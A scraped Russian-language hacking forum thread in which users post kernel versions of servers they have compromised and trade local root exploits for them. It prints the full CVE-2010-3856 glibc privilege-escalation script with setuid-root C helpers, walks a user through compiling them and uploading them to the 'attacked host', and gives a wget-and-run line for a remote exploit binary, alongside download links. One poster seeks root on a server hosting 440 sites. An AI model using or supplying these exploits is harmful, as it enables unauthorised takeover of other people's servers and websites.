Linux *** 2.6.24-24-generic #1 SMP Tue Jul 7 19:10:36 UTC 2009 x86_64 GNU/Linux
Есть что-нибудь?
Linux *** 2.6.24-24-generic #1 SMP Tue Jul 7 19:10:36 UTC 2009 x86_64 GNU/Linux
Есть что-нибудь?
Glibc, sendpage, pipe
Покажи вывод:
ls -la /lib/libc*; ls -la /lib/libpc*; ls -la /lib/libme*; df -h; cat /proc/sys/vm/mmap_min_add
Linux web3a 2.6.32-32-server #62-Ubuntu SMP Wed Apr 20 22:07:43 UTC 2011 x86_64
Помогите подобрать под это.
Наверно, надежда только на Glibc
Linux *** 2.6.18-92.el5 #1 SMP Tue Jun 10 18:51:06 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux есть что-нибудь?
Попробуй что-нибудь из enlightenment'a.
Ну и также sendpage при cat /proc/sys/vm/mmap_min_add = 0
2.6.24-28-server #1 SMP Sat Oct 16 17:53:34 UTC 2010 i686
Почти все перепробовал - не поддается. Чем еще можно?
Linux 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
беру этот http://www.exploit-db.com/exploits/10613/
но пишет Permission Denied
подскажите,что ещё можно попробовать?
Linux 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
беру этот http://www.exploit-db.com/exploits/10613/
но пишет Permission Denied
подскажите,что ещё можно попробовать?
Permission Denied когда компилишь? Или когда запускаешь?
Permission Denied когда компилишь? Или когда запускаешь?
когда компилю
когда компилю
Ну значит дело не в сплоенте, нет прав на gcc, скомпиль на другом серве и пробуй запускать уже бинарник
winstrool
13.09.2011, 11:08
Linux 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
беру этот http://www.exploit-db.com/exploits/10613/
но пишет Permission Denied
подскажите,что ещё можно попробовать?
вот тебе скомпелированный:
CVE-2010-3081
kernel-2.6.18-164 2010 Local Root Exploit
_http://zalil.ru/31690659
extrimportal
13.09.2011, 20:08
народ подскажите плииииз
Linux host.ru 2.6.18-164.15.1.el5PAE #1 SMP Wed Mar 17 12:14:29 EDT 2010 i686
рутну с меня причитается!
попробуй этим
_http://zalil.ru/upload/31693627
народ подскажите плииииз
Linux host.ru 2.6.18-164.15.1.el5PAE #1 SMP Wed Mar 17 12:14:29 EDT 2010 i686
рутну с меня
причитается
!
Glibc - https://rdot.org/forum/showthread.php?t=817
full-nelson - http://www.exploit-db.com/exploits/15704/ (http://www.exploit-db.com/exploits/17787/)
P.S. На счет RDS попутал, он для ядер "2.6.30 - 2.6.36-rc8"
попробуй этим
_http://zalil.ru/upload/31693627
Этот сплоит для 64-битных систем.
RDS - http://www.exploit-db.com/exploits/15285/
Glibc
full-nelson - http://www.exploit-db.com/exploits/15704/ (http://www.exploit-db.com/exploits/17787/)
Этот сплоит для 64-битных систем.
сорри,не тот скинул!
Linux 2.6.32-33-server #70-Ubuntu SMP Thu Jul 7 22:28:30 UTC 2011 x86_64 есть на это чтонибуть желательно скомпилированное буду примного благодарен
Linux 2.6.32-33-server #70-Ubuntu SMP Thu Jul 7 22:28:30 UTC 2011 x86_64 есть на это чтонибуть желательно скомпилированное буду примного благодарен
Очень смешно.
Июль 2011 года =\
Только если Glibc, скидывай результат выполнения команды:
ls -la /lib/libc*; ls -la /lib/libpc*; ls -la /lib/libme*; df -h
extrimportal
13.09.2011, 21:33
Glibc - https://rdot.org/forum/showthread.php?t=817
full-nelson - http://www.exploit-db.com/exploits/15704/ (http://www.exploit-db.com/exploits/17787/)
P.S. На счет RDS попутал, он для ядер "2.6.30 - 2.6.36-rc8"
Этот сплоит для 64-битных систем.
На глибц получаю делетед на $ ls -l /proc/$$/fd/3
при компиляции нельсона
$ gcc half-nelson.c -o half-nelson -lrt 2>&1
half-nelson.c: In function 'get_kstack':
half-nelson.c:212: error: 'MAP_32BIT' undeclared (first use in this function)
half-nelson.c:212: error: (Each undeclared identifier is reported only once
half-nelson.c:212: error: for each function it appears in.)
half-nelson.c:265: warning: integer constant is too large for 'long' type
half-nelson.c:265: warning: comparison is always true due to limited range of data type
half-nelson.c:265: warning: integer constant is too large for 'long' type
half-nelson.c:265: warning: comparison is always false due to limited range of data type
half-nelson.c:231: error: unknown register name 'r8' in 'asm'
half-nelson.c: In function 'do_child_upper':
half-nelson.c:475: warning: integer constant is too large for 'long' type
В чем проблема подскажите пожалуйста.
А также очень интересует
FreeBSD 6.0-RELEASE #0: Thu Mar 16 22:40:51 GET 2006
Netgraph советовали, дохнет.
На глибц получаю делетед на $ ls -l /proc/$$/fd/3
при компиляции нельсона
$ gcc half-nelson.c -o half-nelson -lrt 2>&1
half-nelson.c: In function 'get_kstack':
half-nelson.c:212: error: 'MAP_32BIT' undeclared (first use in this function)
half-nelson.c:212: error: (Each undeclared identifier is reported only once
half-nelson.c:212: error: for each function it appears in.)
half-nelson.c:265: warning: integer constant is too large for 'long' type
half-nelson.c:265: warning: comparison is always true due to limited range of data type
half-nelson.c:265: warning: integer constant is too large for 'long' type
half-nelson.c:265: warning: comparison is always false due to limited range of data type
half-nelson.c:231: error: unknown register name 'r8' in 'asm'
half-nelson.c: In function 'do_child_upper':
half-nelson.c:475: warning: integer constant is too large for 'long' type
В чем проблема подскажите пожалуйста.
А также очень интересует
FreeBSD 6.0-RELEASE #0: Thu Mar 16 22:40:51 GET 2006
Netgraph советовали, дохнет.
Что? deleted?
Если при выполнение команды:$ ls -l /proc/$$/fd/3
Ты получаешь:
[anything]... /proc/[num]/fd/3 -> /tmp/exploit/target (deleted)
То все нормально, так и должно быть. Попроуй half-helson скомпилировать на другой тачке и full-nelson попробуй, может скомпилируется. (Я тебе дал ссылки на оба сплоита full / half - nelson ).
В каком смысле Нетграф дохнет?
Кроме Нетграфа его врятли что возьмет.
extrimportal
14.09.2011, 13:58
Что? deleted?
Если при выполнение команды:$ ls -l /proc/$$/fd/3
Ты получаешь:
[anything]... /proc/[num]/fd/3 -> /tmp/exploit/target (
deleted
)
То все нормально, так и должно быть. Попроуй half-helson скомпилировать на другой тачке и full-nelson попробуй, может скомпилируется. (Я тебе дал ссылки на оба сплоита full / half - nelson ).
В каком смысле Нетграф дохнет?
Кроме Нетграфа его врятли что возьмет.
на full-nelson получаю:
Failed to open file descriptors.
half-helson скомплил на другой тачке, но не получаю ничего.
в glibc не на второй запрос получаю, а на два запроса
ls -l /proc/$$/fd/3
получаю:
lrwx------ 1 ufre17 ksanln 64 Sep 14 02:40 /proc/14557/fd/3 -> /tmp/eaccelerator.cgi-fcgi14544.sem.GzWKqm (deleted)
на Netgraph получаю:
[CODE]
~ FreeBSD
в glibc не на второй запрос получаю, а на два запроса
ls -l /proc/$$/fd/3
получаю:
lrwx------ 1 ufre17 ksanln 64 Sep 14 02:40 /proc/14557/fd/3 -> /tmp/eaccelerator.cgi-fcgi14544.sem.GzWKqm (deleted)
Я тебе выше же написал, что так и должно быть =)
Делай дальше. У тебя есть хорошие шансы поиметь сервак через Glibc.
[QUOTE="extrimportal"]
на Netgraph получаю:
[CODE]
~ FreeBSD
extrimportal
14.09.2011, 17:20
трудно блин, просто я читал что на первый запрос
ls -l /proc/$$/fd/3
должен получать
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
а получаю
lrwx------ 1 ufre17 ksanln 64 Sep 14 02:40 /proc/14557/fd/3 -> /tmp/eaccelerator.cgi-fcgi14544.sem.GzWKqm (deleted)
и все равно даже если так и задумано то я на
$ ls -l /tmp/exploit
не получаю нифига, а как я понял должен
что то типа
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
я так понял .с не собрался или что х.з.
жалко блин на серваке 440 сайтов), тоесть в долгу не останусь))
antiaudomain
16.09.2011, 07:08
2.6.18-238.el5 #1 SMP Sun Dec 19 14:22:44 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
можете что подсказать под это дело?
2.6.18-238.el5 #1 SMP Sun Dec 19 14:22:44 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
можете что подсказать под это дело?
glibs попробуй
http://www.opennet.ru/opennews/art.shtml?num=28338
antiaudomain
16.09.2011, 11:02
glibs попробуй
http://www.opennet.ru/opennews/art.shtml?num=28338
ссылка не создается, когда делаю ln /bin/ping ...
больше нет вариантов?
BLurpi^_^
16.09.2011, 17:36
Linux 2.6.18-238.12.1.el5 есть у кого то?
BLurpi^_^,
не тупи. Полный uname -a покажи!
Linux 2.6.18-238.12.1.el5 есть у кого то?
нету, прежде чем спрашивать полистай тему...нету сплойтов под ядра 2011 года
ссылка не создается, когда делаю ln /bin/ping ...
больше нет вариантов?
ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;
Скинь результат выполнений этой команды.
нету, прежде чем спрашивать полистай тему...нету сплойтов под ядра 2011 года
Ошибаешся ^_^
Ошибаешся ^_^
Ну приведи примеры, раз я ошибаюсь!
antiaudomain
16.09.2011, 21:26
ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;
Скинь результат выполнений этой команды.
sh-3.2$ ln /bin/ping /var/tmp/exploit/target
ln: creating hard link `/var/tmp/exploit/target' to `/bin/ping': Invalid cross-device link
sh-3.2$ ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;
-rwxr-xr-x 1 root root 1693812 Apr 8 08:44 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 Aug 4 13:25 /lib/libc.so.6 -> libc-2.5.so
-rwxr-xr-x 1 root root 191708 Apr 8 08:44 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 Aug 4 13:25 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 Aug 4 13:25 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6364 May 3 16:27 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 Apr 8 08:44 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 Aug 4 13:25 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 May 4 05:38 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 19 Aug 4 13:25 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 16 Mar 10 2011 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 127760 Mar 1 2011 /lib/libpcre.so.0.0.1
ls: /lib/libme*: No such file or directory
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup00-root
4.8G 3.5G 1.1G 76% /
/dev/sda1 487M 31M 431M 7% /boot
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sda3 487M 54M 409M 12% /tmp
/dev/mapper/VolGroup00-var
387G 316G 56G 86% /var
ядра 2005ого года чем рутаются?
SpaceMan
18.09.2011, 13:45
есть что нибудь на :
Linux version 2.6.18-194.26.1.el5.028stab081.1 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Thu Dec 23 20:17:23 MSK 2010
ядра 2005ого года чем рутаются?
http://www.1337day.com/
ядра начиная с 2001г.
Если не найдёшь, то кидай полную инфу о ядре
есть что нибудь на :
Linux version 2.6.18-194.26.1.el5.028stab081.1 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Thu Dec 23 20:17:23 MSK 2010
Нет.
есть что нибудь на:
Linux 2.6.35.9 #1 SMP Thu Dec 9 04:26:51 CET 2010 i686
Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:22:04 EDT 2011
extrimportal
19.09.2011, 19:52
подсобите
OS: Linux 2.6.18-194.8.1.el5.028stab070.4 #1 SMP Tue Aug 17 19:11:52 MSD 2010 x86_64
infoseller
19.09.2011, 21:02
Linux server 2.6.18-238.19.1.el5 #1 SMP Fri Jul 15 07:31:24 EDT 2011 x86_64 подскажите что-нибудь, плиз...
2 ресурса:
Linux 2.6.32.11-grsec #2 SMP Tue Apr 27 14:53:56 PDT 2010 i686
Darwin 10.8.0 Darwin Kernel Version 10.8.0: Tue Jun 7 16:32:41 PDT 2011; root:xnu-1504.15.3~1/RELEASE_X86_64 x86_64
подскажите пожалуйста что-нить по этим версиям.
2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 30 17:02:48 EDT 2010 i686
Можно пробить чем-нибудь, кроме glibс? Для glibс, как я понимаю, нужен gcc, а его нет на сервере.
2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 30 17:02:48 EDT 2010 i686
Можно пробить чем-нибудь, кроме glibс? Для glibс, как я понимаю, нужен gcc, а его нет на сервере.
Для Glibc нужен один милипиздришный бинарник, который скомпилируется на любом шелле с Gcc.
Для Glibc нужен один милипиздришный бинарник, который скомпилируется на любом шелле с Gcc.
Не понимаю, как Glibc-експлоит можно запустить без gcc? Сам эксплоит основан на компиляции же.
Вот к примеру.
#!/bin/bash
# CVE-2010-3856
# Author: deadbyte
OUTPUT=/etc/ld.so.preload
MASK=`umask`
umask 0
LD_AUDIT="libmemusage.so"MEMUSAGE_OUTPUT="$OUTPUT"ping 2> /dev/null
if [ ! -f $OUTPUT];then
echo"System does not appear to be vulnerable"
exit0
fi
echo -n>$OUTPUT
umask $MASK
cat>exec.c
#include
main(int argc,char*argv[])
{
if(argc==2) {
setgid(0);setuid(0);
system(argv[1]); }
return0;
}
EOF
gcc exec.c-o exec
cat>sh.c
#include
#include
int main()
{
setuid(geteuid());
setgid(getegid());
execl("/bin/sh","bin/sh","-c","cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;",NULL);
return0;
}
EOF
gcc sh.c-o sh
cat>libpwn.c
#include
uid_t getuid(void)
{
chown("$PWD/sh",0,0);
chmod("$PWD/sh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S _IROTH|S_IXOTH);
return0;
}
EOF
gcc-Wall-fPIC-c libpwn.c
gcc-shared-Wl,-soname,libpwn.so-o libpwn.so libpwn.o
echo"$PWD/libpwn.so">$OUTPUT
ping 2> /dev/null
echo -n>$OUTPUT
./sh
В этом bash-скрипте происходит вызов gcc sh.c -o sh
Не понимаю, как Glibc-експлоит можно запустить без gcc? Сам эксплоит основан на компиляции же.
Вот к примеру.
#!/bin/bash
# CVE-2010-3856
# Author: deadbyte
OUTPUT=/etc/ld.so.preload
MASK=`umask`
umask 0
LD_AUDIT="libmemusage.so"MEMUSAGE_OUTPUT="$OUTPUT"ping 2> /dev/null
if [ ! -f $OUTPUT];then
echo"System does not appear to be vulnerable"
exit0
fi
echo -n>$OUTPUT
umask $MASK
cat>exec.c
#include
main(int argc,char*argv[])
{
if(argc==2) {
setgid(0);setuid(0);
system(argv[1]); }
return0;
}
EOF
gcc exec.c-o exec
cat>sh.c
#include
#include
int main()
{
setuid(geteuid());
setgid(getegid());
execl("/bin/sh","bin/sh","-c","cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;",NULL);
return0;
}
EOF
gcc sh.c-o sh
cat>libpwn.c
#include
uid_t getuid(void)
{
chown("$PWD/sh",0,0);
chmod("$PWD/sh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S _IROTH|S_IXOTH);
return0;
}
EOF
gcc-Wall-fPIC-c libpwn.c
gcc-shared-Wl,-soname,libpwn.so-o libpwn.so libpwn.o
echo"$PWD/libpwn.so">$OUTPUT
ping 2> /dev/null
echo -n>$OUTPUT
./sh
В этом bash-скрипте происходит вызов gcc sh.c -o sh
1. Компилируешь бинарники на другой тачке
2. Меняешь башик примерно таким образом:
#!/bin/bash
# CVE-2010-3856
# Author: deadbyte
OUTPUT=/etc/ld.so.preload
MASK=`umask`
umask 0
LD_AUDIT="libmemusage.so"MEMUSAGE_OUTPUT="$OUTPUT"ping 2> /dev/null
if [ ! -f $OUTPUT];then
echo"System does not appear to be vulnerable"
exit0
fi
echo -n>$OUTPUT
umask $MASK
echo"$PWD/libpwn.so">$OUTPUT
ping 2> /dev/null
echo -n>$OUTPUT
./sh
Т.е. на другой тачке создай 3 файла:
1. exec.c
#include
#include
main(int argc,char*argv[])
{
if(argc==2) {
setgid(0);setuid(0);
system(argv[1]); }
return0;
}
2. sh.c
#include
#include
#include
int main()
{
setuid(geteuid());
setgid(getegid());
execl("/bin/sh","bin/sh","-c","cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;",NULL);
return0;
}
3. libpwn.c
#include
#include
uid_t getuid(void)
{
chown("$PWD/sh",0,0);
chmod("$PWD/sh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S _ IROTH|S_IXOTH);
return0;
}
Вместо $PWD впиши каталог, в котором будешь выполнять все это на атакуемой тачке, к примеру /tmp.
Затем выполни команды:
1. gcc exec.c -o exec
2. gcc sh.c -o sh
3. gcc -Wall -fPIC -c libpwn.c
4. gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
И все файлы, полученные на выходе, залей на атакуемый хост рядом с своим баш скриптиком.
1. Компилируешь бинарники на другой тачке
2. Меняешь башик примерно таким образом:
#!/bin/bash
# CVE-2010-3856
# Author: deadbyte
OUTPUT=/etc/ld.so.preload
MASK=`umask`
umask 0
LD_AUDIT="libmemusage.so"MEMUSAGE_OUTPUT="$OUTPUT"ping 2> /dev/null
if [ ! -f $OUTPUT];then
echo"System does not appear to be vulnerable"
exit0
fi
echo -n>$OUTPUT
umask $MASK
echo"$PWD/libpwn.so">$OUTPUT
ping 2> /dev/null
echo -n>$OUTPUT
./sh
Т.е. на другой тачке создай 3 файла:
1. exec.c
#include
#include
main(int argc,char*argv[])
{
if(argc==2) {
setgid(0);setuid(0);
system(argv[1]); }
return0;
}
2. sh.c
#include
#include
#include
int main()
{
setuid(geteuid());
setgid(getegid());
execl("/bin/sh","bin/sh","-c","cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;",NULL);
return0;
}
3. libpwn.c
#include
#include
uid_t getuid(void)
{
chown("$PWD/sh",0,0);
chmod("$PWD/sh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S _ IROTH|S_IXOTH);
return0;
}
Вместо $PWD впиши каталог, в котором будешь выполнять все это на атакуемой тачке, к примеру /tmp.
Затем выполни команды:
1. gcc exec.c -o exec
2. gcc sh.c -o sh
3. gcc -Wall -fPIC -c libpwn.c
4. gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
И все файлы, полученные на выходе, залей на атакуемый хост рядом с своим баш скриптиком.
Спасибо, что разжевал все.
Жалко, что
System does not appear to be vulnerable
Запатчено типа?
C-r-A-c-K
22.09.2011, 16:20
знатоки, подскажите пожалуйста сплоит на
FreeBSD 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Mon Jul 12 19:23:19 UTC 2010 root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64
shell_c0de
22.09.2011, 17:09
2C-r-A-c-K пробуй http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+attackvector+%28Attack+Vector %29
C-r-A-c-K
22.09.2011, 17:37
shell_c0de, в консоли (порта 7030) получаю циклический набор символов, в итоге nc вылетает
под это есть что>?
Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64
MisterGood
22.09.2011, 18:57
Помогите под этот найти:
Linux 2.6.32-71.29.1.el6.x86_64 #1 SMP Mon Jun 27 19:49:27 BST 2011 x86_64 x86_64 x86_64 GNU/Linux
под это есть что>?
Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64
wget http://trav1an.t35.com/Localz/Localz-1
chmod +x Localz-1
./Localz-1
Подскажите под это что-то
2.6.26-2-amd64 #1 SMP Thu Nov 25 04:30:55 UTC 2010 x86_64
SergioBlog
23.09.2011, 23:10
Посоветуйте плз что-то под это ядро:
Linux version 2.6.9-023stab053.2-enterprise (root@rhel4-32) (gcc version 3.4.5 20051201 (Red Hat 3.4.5-2)) #1 SMP Mon Oct 25 18:37:43 MSD 2010
Distr name:
CentOS release 5.2 (Final)
Kernel \r on an \m
Нашёл Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit, подойдёт?
Linux *** 2.6.30.5-x86-intel #1 SMP Mon Aug 17 17:14:40 CEST 2009 i686 GNU/Linux
$ ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;
-rwxr-xr-x 1 root root 1294572 Jan 8 2011 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 Jan 28 2011 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 Oct 28 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 Oct 28 2010 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 Jul 26 2008 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 Oct 28 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 Apr 15 2008 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 185816 Jan 8 2011 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 Jan 28 2011 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 Oct 28 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 Oct 13 2008 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Oct 28 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 Apr 15 2008 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 38296 Jan 8 2011 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 Jan 28 2011 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 Oct 28 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 Apr 15 2008 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5440 Jan 8 2011 /lib/libpcprofile.so
-rw-r--r-- 1 root root 13692 Jan 8 2011 /lib/libmemusage.so
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 14G 10G 3.1G 77% /
tmpfs 3.0G 0 3.0G 0% /lib/init/rw
/dev/sda1 92M 24M 64M 27% /boot
/dev/sda5 430G 61G 348G 15% /home
/dev/sda6 14G 8.2G 4.9G 63% /var
Вот под это кто нить что-нить пробивает ??
OS version: Linux version 2.6.25-NX.18-calcutta (root@sysresccd) (gcc version 4.4.3 (Gentoo 4.4.3-r2 p1.2) ) #1 SMP Tue Feb 22 00:59:06 MSK 2011
C-r-A-c-K
24.09.2011, 23:16
коллеги, будьте любезны, подскажите сплоит под
FreeBSD dsfr17.fornex.org 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Mon Jul 19 02:36:49 UTC 2010 root@xxxx.xxx:/usr/obj/usr/src/sys/GENERIC amd64
MisterGood
25.09.2011, 00:16
Помогите под FreeBSD 6.4 найти, ничего не пробивает
KosoyRoman
25.09.2011, 21:14
Linux ubuntu 2.6.34-xen-fly #1 SMP Mon Jun 6 10:33:10 UTC 2011 x86_64 GNU/Linux
Кто посоветует что ребята?
antiaudomain
26.09.2011, 00:29
Linux vh4 2.6.34-hardened-r6 #2 SMP Tue Dec 21 20:54:19 PST 2010 x86_64
подскажите, люди добрые?
ipetryxa
26.09.2011, 01:20
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Jan 13 00:12:41 UTC 2010 x86_64
Что посоветуете?
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Jan 13 00:12:41 UTC 2010 x86_64
Что посоветуете?
Glibc или асидбитчес
Linux 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10 EDT 2009 i686
Подскажите сплоит плиз
Linux vh4 2.6.34-hardened-r6 #2 SMP Tue Dec 21 20:54:19 PST 2010 x86_64
подскажите, люди добрые?
вероятно что rds (http://gonqueror.narod.ru/rds.c) возмет
Linux 2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64
Подскажите, что можно найти под это
Linux 2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64
Подскажите, что можно найти под это
Ac1dB1tCh3z пробьёт
golnzales
30.09.2011, 04:37
Linux 2.6.9-78.0.22.ELsmp #1 SMP Fri Apr 24 12:48:19 EDT 2009 x86_64
Нашел эксп какой-то: http://www.securiteam.com/exploits/5VP0N0UF5U.html, но он не собирается как и написано в камментах к нему. как пробить?
C-r-A-c-K
30.09.2011, 17:32
FreeBSD 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May 1 08:49:13 UTC 2009 i386
что пробьет этого зверька?) подскажите умнейшие)
FreeBSD 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May 1 08:49:13 UTC 2009 i386
что пробьет этого зверька?) подскажите умнейшие)
http://www.exploit-db.com/exploits/10255/
Linux 2.6.18-238.19.1.el5PAE #1 SMP Fri Jul 15 12:17:47 EDT 2011 i686
Можно ли повысить привелегии?
Expl0ited
01.10.2011, 12:32
Можно ли повысить привелегии?
Нет.
Linux 2.6.18-194.17.4.el5 #1 SMP Mon Oct 25 15:50:53 EDT 2010 x86_64
можно что-нибудь придумать?
Expl0ited
01.10.2011, 19:25
Тема закрыта в связи с малой информативностью в задаваемых вопросах. Новая тема находится здесь (https://antichat.live/threads/296327/) .
ВНИМАТЕЛЬНО ЧИТАЙТЕ ПРАВИЛА ОФОРМЛЕНИЯ СООБЩЕНИЯ!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot